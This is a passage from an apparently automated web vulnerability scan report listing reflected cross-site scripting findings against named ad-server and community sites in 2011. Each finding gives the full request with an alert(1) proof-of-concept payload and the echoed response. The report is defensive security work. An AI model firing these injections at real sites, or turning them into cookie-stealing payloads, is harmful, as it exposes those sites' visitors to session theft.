Host:   http://img.mediaplex.com
Path:   /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e11fd"%3balert(1)//a07e3cbe07d was submitted in the mpck parameter. This input was echoed as e11fd";alert(1)//a07e3cbe07d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375856%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.441240%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D4452179138624526041%26Perf_Tracker_6%3D7%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fb2381d1310a0aa178150b1ff970218501a77a7%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252456491190%26imp_rvr_id%3D252456491190e11fd"%3balert(1)//a07e3cbe07d&siteid=0&mpt=1312375856&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.441240&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=4452179138624526041&Perf_Tracker_6=7&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=252456491190&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=1377845577

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:52:12 GMT
Server: Apache
Last-Modified: Fri, 22 Jul 2011 17:18:33 GMT
ETag: "74a6-9d4-4a8aba7af4c40"
Accept-Ranges: bytes
Content-Length: 4366
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck252456491190\">" );
var rvr_id=252456491190;
var mpserv;
var mpi="img-cdn.mediaplex.com/0/";

...[SNIP]...
r_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=252456491190e11fd";alert(1)//a07e3cbe07d";
var mpcke="<mpcke/>
...[SNIP]...

2.133. http://img.mediaplex.com/content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 708c2"%3balert(1)//0158e76f8ed was submitted in the mpvc parameter. This input was echoed as 708c2";alert(1)//0158e76f8ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375856%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.441240%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D4452179138624526041%26Perf_Tracker_6%3D7%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fb2381d1310a0aa178150b1ff970218501a77a7%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252456491190%26imp_rvr_id%3D252456491190&siteid=0&mpt=1312375856&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.441240&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=4452179138624526041&Perf_Tracker_6=7&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=252456491190&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D708c2"%3balert(1)//0158e76f8ed HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=1377845577

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:52:18 GMT
Server: Apache
Last-Modified: Fri, 22 Jul 2011 17:18:33 GMT
ETag: "74a6-9d4-4a8aba7af4c40"
Accept-Ranges: bytes
Content-Length: 4366
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck252456491190\">" );
var rvr_id=252456491190;
var mpserv;
var mpi="img-cdn.mediaplex.com/0/";

...[SNIP]...
P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA./cnd=!7wRZKAjXiAQQtNchGMnCBCAA/referrer=http%3A%2F%2Fweather.uk.msn.com/clickenc=708c2";alert(1)//0158e76f8ed";
var bangmpvc="http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQ
...[SNIP]...

2.134. http://it.toolbox.com/people/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /people/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3b0a'-alert(1)-'52ca6c24b5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /people/?f3b0a'-alert(1)-'52ca6c24b5f=1 HTTP/1.1
Host: it.toolbox.com
Proxy-Connection: keep-alive
Referer: http://networking.ittoolbox.com/groups/technical-functional/vpn-l/?cid=30913571
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EREF=dest=http%3a%2f%2fnetworking.ittoolbox.com%2fgroups%2ftechnical-functional%2fvpn-l%2f&source=&rid=859445

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 113543
Date: Tue, 02 Aug 2011 11:17:20 GMT
X-Varnish: 1397464633
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Cache-Control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   People Sear
...[SNIP]...
sender != ctaBtnClicked) {
ctaBtnClicked = sender;
ctaDtClicked = new Date();
var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fPeopleSearch.aspx%3ff3b0a'-alert(1)-'52ca6c24b5f%3d1';
ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

2.135. http://it.toolbox.com/people/typewriter/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /people/typewriter/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12e54'-alert(1)-'bcc5d1849aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /people/typewriter12e54'-alert(1)-'bcc5d1849aa/ HTTP/1.1
Host: it.toolbox.com
Proxy-Connection: keep-alive
Referer: http://it.toolbox.com/people/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EREF=dest=http%3a%2f%2fnetworking.ittoolbox.com%2fgroups%2ftechnical-functional%2fvpn-l%2f&source=&rid=859445; s_cc=true; s_vi=[CS]v1|271BEE51051D017A-6000012DA01DAE10[CE]; s_sq=ittoolglobal%2Cittoolglobalit%3D%2526pid%253DIT%25253Apeople%25253Asearch%25253APeople%252520Search%2526pidt%253D1%2526oid%253Dhttp%25253A//it.toolbox.com/people/typewriter/%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 30294
Date: Tue, 02 Aug 2011 11:19:40 GMT
X-Varnish: 1397465601
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Cache-Control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   User Not Fo
...[SNIP]...
<script>$.get('/api/t/2/rt/?u=http%3a%2f%2fit.toolbox.com%2fpeople%2ftypewriter12e54'-alert(1)-'bcc5d1849aa%2f&r='+document.referrer);</script>
...[SNIP]...

2.136. http://it.toolbox.com/people/typewriter/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /people/typewriter/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd3e6'-alert(1)-'36af26b13a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /people/typewriter/?fd3e6'-alert(1)-'36af26b13a9=1 HTTP/1.1
Host: it.toolbox.com
Proxy-Connection: keep-alive
Referer: http://it.toolbox.com/people/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EREF=dest=http%3a%2f%2fnetworking.ittoolbox.com%2fgroups%2ftechnical-functional%2fvpn-l%2f&source=&rid=859445; s_cc=true; s_vi=[CS]v1|271BEE51051D017A-6000012DA01DAE10[CE]; s_sq=ittoolglobal%2Cittoolglobalit%3D%2526pid%253DIT%25253Apeople%25253Asearch%25253APeople%252520Search%2526pidt%253D1%2526oid%253Dhttp%25253A//it.toolbox.com/people/typewriter/%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 50851
Date: Tue, 02 Aug 2011 11:19:23 GMT
X-Varnish: 1397465474
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Cache-Control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Typewriter
...[SNIP]...
d) {
ctaBtnClicked = sender;
ctaDtClicked = new Date();
var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fProfile.aspx%3fdisplayname%3dtypewriter%26fd3e6'-alert(1)-'36af26b13a9%3d1';
ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

2.137. http://jlinks.industrybrains.com/jsct [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 64e49<script>alert(1)</script>2f37d82aa30 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=940&ct=TOOLBOX_ROS64e49<script>alert(1)</script>2f37d82aa30&num=5&layt=560x350&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://networking.ittoolbox.com/groups/technical-functional/vpn-l/?cid=30913571
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Tue, 02 Aug 2011 11:16:06 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Tue, 02 Aug 2011 11:16:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 82

// Error: Unknown old section TOOLBOX_ROS64e49<script>alert(1)</script>2f37d82aa30

2.138. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 61a70<script>alert(1)</script>4a502281a35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350&fmt=simp&61a70<script>alert(1)</script>4a502281a35=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://networking.ittoolbox.com/groups/technical-functional/vpn-l/?cid=30913571
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Tue, 02 Aug 2011 11:16:07 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Tue, 02 Aug 2011 11:16:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 69

// Error: Unknown parameter 61a70<script>alert(1)</script>4a502281a35

2.139. http://mfa.unilever.predicta.net/mrm-ad/ad/script/ [;c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mfa.unilever.predicta.net
Path:   /mrm-ad/ad/script/

Issue detail

The value of the ;c request parameter is copied into the HTML document as plain text between tags. The payload 610ff<script>alert(1)</script>fb144f72136 was submitted in the ;c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mrm-ad/ad/script/?;c=1119;sc=3918;p=6;n=e08aeb6593;tc=http://a.bolsademulher.com/www/delivery/ck.php?oaparams=2__bannerid=6850__zoneid=133__source=casamento__cb=e08aeb6593__oadest=610ff<script>alert(1)</script>fb144f72136 HTTP/1.1
Host: mfa.unilever.predicta.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msn.bolsademulher.com/casamento
Cookie: lp=1f8b08000000000000002dc7b101c0300c02b063f20018c7d4bf717c3b74d0a023d81d86b529663a12989583cc07a15832e166dd7f90fbd97901d45aa8d03f000000; puid=2ebe9905-bbd7-4603-b01e-a42c408f6ffc#; mrm_c_uv=1f8b0800000000000000b33436af31343634323637303637b1b034c3c7530600e3296b072e000000; mrm_p_uv=1f8b08000000000000003336303737a931343634323637303637b1b034c3c75306006473fc6b30000000; mrm_s=1f8b0800000000000000b33436af3133a931343634323637303637b1b034c3c75306004508761131000000; mrm_sec=1f8b0800000000000000b33436af31363630ac31343634323637303637b1b034c3c75306007a22b7c433000000

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 11:40:04 GMT
Set-Cookie: lp=1f8b08000000000000004dcbb90dc0400c03c162dc0029ea39f5c6e27d8901071b6c304f4258d3699e302bace531c9351c37986268d8c8aafaae76a17e84996bcd5807dd6909f46a2eec3fc724e3e3d0e4d97e019f1193fe7f000000; Domain=.unilever.predicta.net; Expires=Mon, 01-Aug-2016 11:40:04 GMT; Path=/
Set-Cookie: puid=2ebe9905-bbd7-4603-b01e-a42c408f6ffc#; Domain=.predicta.net; Expires=Mon, 01-Aug-2016 11:40:04 GMT; Path=/
Set-Cookie: mrm_c_uv=1f8b0800000000000000333434b4ac3134363432363734b5b4343036c3c753b63436878a18189b9b58589ae1e32903008a9d6ed85d000000; Expires=Mon, 01-Aug-2016 11:40:04 GMT; Path=/
Set-Cookie: mrm_p_uv=1f8b08000000000000007dc8b10100200803b06378a058a4f6378f7771664c0a846f321795db067b521052fd0355c73d291e527954cb60000000; Expires=Mon, 01-Aug-2016 11:40:04 GMT; Path=/
Set-Cookie: mrm_s=1f8b08000000000000007dc8b90100200803c0615880101eb31bc3db585bde01d0a2624104072539fb2713673b5f3a278ffa27bbaad6e1ca64000000; Expires=Mon, 01-Aug-2016 11:40:04 GMT; Path=/
Set-Cookie: mrm_sec=1f8b08000000000000007dc8b10100200804b1615c80f315fcdd18dec6da3201dc32a71153c5b643f9d3b0aaa5e075a8d671fe342e41572bf767000000; Expires=Mon, 01-Aug-2016 11:40:04 GMT; Path=/
P3P: CP=" ADMa OUR NOR CNT NID DSP NOI COR", policyref="/w3c/p3p.xml"
Pragma: no-cache
Cache-Control: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1202

if(typeof MAEs!="object"){var MAEs={write:function(p){var hasMAEP=(typeof MAEPARAMS=="object"&&typeof MAEPARAMS["p"+p.pi]!="undefined");var rn=Math.round(Math.random()*10000);MAEs.rn=rn;var pl=MRMTag.
...[SNIP]...
/39179.swf',im:'http://img.predicta.predicta.net/39001-40000/39178.jpg',r:'http://a.bolsademulher.com/www/delivery/ck.php?oaparams=2__bannerid=6850__zoneid=133__source=casamento__cb=e08aeb6593__oadest=610ff<script>alert(1)</script>fb144f72136http://mfa.unilever.predicta.net/mrm-ad/ad/url/?;c=1119;sc=3918;p=6;b=40309;n=e08aeb6593;',wm:'opaque',px:'http://mfa.unilever.predicta.net/mrm-ad/ad/rm/?;c=1119;sc=3918;p=6;b=40309;',clf:0,pi:'6'});

2.140. http://mfa.unilever.predicta.net/mrm-ad/ad/script/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mfa.unilever.predicta.net
Path:   /mrm-ad/ad/script/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 694c7<script>alert(1)</script>20f6d3d94c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mrm-ad/ad/script/?;c=1119;sc=3918;p=6;n=e08aeb6593;tc=http://a.bolsademulher.com/www/delivery/ck.php?oaparams=2__bannerid=6850__zoneid=133__source=casamento__cb=e08aeb6593__oadest=&694c7<script>alert(1)</script>20f6d3d94c4=1 HTTP/1.1
Host: mfa.unilever.predicta.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msn.bolsademulher.com/casamento
Cookie: lp=1f8b08000000000000002dc7b101c0300c02b063f20018c7d4bf717c3b74d0a023d81d86b529663a12989583cc07a15832e166dd7f90fbd97901d45aa8d03f000000; puid=2ebe9905-bbd7-4603-b01e-a42c408f6ffc#; mrm_c_uv=1f8b0800000000000000b33436af31343634323637303637b1b034c3c7530600e3296b072e000000; mrm_p_uv=1f8b08000000000000003336303737a931343634323637303637b1b034c3c75306006473fc6b30000000; mrm_s=1f8b0800000000000000b33436af3133a931343634323637303637b1b034c3c75306004508761131000000; mrm_sec=1f8b0800000000000000b33436af31363630ac31343634323637303637b1b034c3c75306007a22b7c433000000

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 11:40:04 GMT
Set-Cookie: lp=1f8b08000000000000004dcbb10dc0300c03c161bc0029ca92b51b878f8b0448f1c517b712c2984ef384b9c31a1e931cc3718329869a85ece4777b06aa25745f6bc638e84a4ba0477d61fd392e8efd1ed479a61ef2024bcd7f000000; Domain=.unilever.predicta.net; Expires=Mon, 01-Aug-2016 11:40:04 GMT; Path=/
Set-Cookie: puid=2ebe9905-bbd7-4603-b01e-a42c408f6ffc#; Domain=.predicta.net; Expires=Mon, 01-Aug-2016 11:40:04 GMT; Path=/
Set-Cookie: mrm_c_uv=1f8b0800000000000000333434b4ac3134363432363734b5b4343036c3c753b63436878a18189b9b58589ae1e32903008a9d6ed85d000000; Expires=Mon, 01-Aug-2016 11:40:04 GMT; Path=/
Set-Cookie: mrm_p_uv=1f8b08000000000000007dc8b10100200803b06378a058a4f6378f7771664c0a846f321795db067b521052fd0355c73d291e527954cb60000000; Expires=Mon, 01-Aug-2016 11:40:04 GMT; Path=/
Set-Cookie: mrm_s=1f8b08000000000000007dc8b90100200803c0615880101eb31bc3db585bde01d0a2624104072539fb2713673b5f3a278ffa27bbaad6e1ca64000000; Expires=Mon, 01-Aug-2016 11:40:04 GMT; Path=/
Set-Cookie: mrm_sec=1f8b08000000000000007dc8b10100200804b1615c80f315fcdd18dec6da3201dc32a71153c5b643f9d3b0aaa5e075a8d671fe342e41572bf767000000; Expires=Mon, 01-Aug-2016 11:40:04 GMT; Path=/
P3P: CP=" ADMa OUR NOR CNT NID DSP NOI COR", policyref="/w3c/p3p.xml"
Pragma: no-cache
Cache-Control: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1205

if(typeof MAEs!="object"){var MAEs={write:function(p){var hasMAEP=(typeof MAEPARAMS=="object"&&typeof MAEPARAMS["p"+p.pi]!="undefined");var rn=Math.round(Math.random()*10000);MAEs.rn=rn;var pl=MRMTag.
...[SNIP]...
39179.swf',im:'http://img.predicta.predicta.net/39001-40000/39178.jpg',r:'http://a.bolsademulher.com/www/delivery/ck.php?oaparams=2__bannerid=6850__zoneid=133__source=casamento__cb=e08aeb6593__oadest=&694c7<script>alert(1)</script>20f6d3d94c4=1http://mfa.unilever.predicta.net/mrm-ad/ad/url/?;c=1119;sc=3918;p=6;b=40309;n=e08aeb6593;',wm:'opaque',px:'http://mfa.unilever.predicta.net/mrm-ad/ad/rm/?;c=1119;sc=3918;p=6;b=40309;',clf:0,pi:'6'});
...[SNIP]...

2.141. http://o.lomadee.com/loc/locWrite.html [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.lomadee.com
Path:   /loc/locWrite.html

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7d4a2<script>alert(1)</script>4b6bb94e076 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /loc/locWrite.html?callback=json17d4a2<script>alert(1)</script>4b6bb94e076&ul=http%3A%2F%2Fmsn.buscape.com.br%2F&tt=MSN%20Shopping&re=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&us=502312310620110803131826&pa=3627&pd=BP&tm=1920x1200&cr=16-bit HTTP/1.1
Host: o.lomadee.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msn.buscape.com.br/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://docs.lomadee.com/w3c/p3p.xml", CP="PSA CONo OUR ONL BUS NOI"
Connection: close
